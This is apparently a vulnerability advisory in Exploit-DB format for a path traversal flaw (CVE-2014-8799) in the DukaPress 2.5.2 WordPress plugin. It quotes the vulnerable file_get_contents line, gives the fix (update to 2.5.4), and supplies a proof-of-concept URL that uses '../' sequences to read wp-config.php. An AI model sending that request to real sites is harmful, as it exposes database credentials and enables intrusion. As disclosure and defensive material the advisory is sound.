30 lines
No EOL
907 B
Text
30 lines
No EOL
907 B
Text
# Exploit Title: DukaPress 2.5.2 Path Traversal
|
|
# Date: 27-10-2014
|
|
# Exploit Author: Kacper Szurek - http://security.szurek.pl
|
|
# Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
|
|
# Category: webapps
|
|
# CVE: CVE-2014-8799
|
|
|
|
1. Description
|
|
|
|
dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.
|
|
|
|
File: dukapress\lib\dp_image.php
|
|
if (!function_exists('add_action')) {
|
|
require_once('../../../../wp-load.php');
|
|
}
|
|
|
|
echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));
|
|
|
|
http://security.szurek.pl/dukapress-252-path-traversal.html
|
|
|
|
2. Proof of Concept
|
|
|
|
http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
|
|
|
|
3. Solution:
|
|
|
|
Update to version 2.5.4
|
|
|
|
https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip
|
|
https://plugins.trac.wordpress.org/changeset/1024640/dukapress |